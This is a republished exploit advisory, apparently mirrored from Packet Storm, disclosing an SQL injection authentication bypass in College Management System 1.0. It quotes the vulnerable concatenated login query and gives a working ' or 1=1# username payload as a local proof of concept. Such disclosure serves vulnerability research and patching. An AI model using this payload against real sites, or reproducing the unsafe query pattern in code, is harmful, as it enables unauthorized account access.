College Management System 1.0 SQL Injection ≈ Packet Storm

Roger Wilco Exploits 4 octobre 2021 Affichages : 295

# Exploit Title: college management system - SQL Injection Authentication Bypass
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux

in login/login.php in line 8 :

$username=$_POST["email"];
$password=$_POST["password"];

$query="select * from login where user_id='$username' and Password='$password' ";
$result=mysqli_query($con,$query);

POC :
http://127.0.0.1/2/College-Management-System/login/login.php
username : ' or 1=1#
password : 123456

WHAT ARE YOU LOOKING FOR?

Popular Tags

College Management System 1.0 SQL Injection ≈ Packet Storm

Follow us on

Most popular

Tiki Wiki CMS Groupware 21.1 Authentication Bypass ≈ Packet Storm

Aimeos Laravel Ecommerce Platform 2021.10 LTS SQL Injection ≈ Packet Storm

Phone Shop Sales Managements System 1.0 Shell Upload ≈ Packet Storm

OpenSMTPD Out-Of-Bounds Read / Local Privilege Escalation ≈ Packet Storm

Monitorr 1.7.6m Authorization Bypass ≈ Packet Storm

Tomato: 1 Vulnhub Walkthrough

Category

Popular Sections

About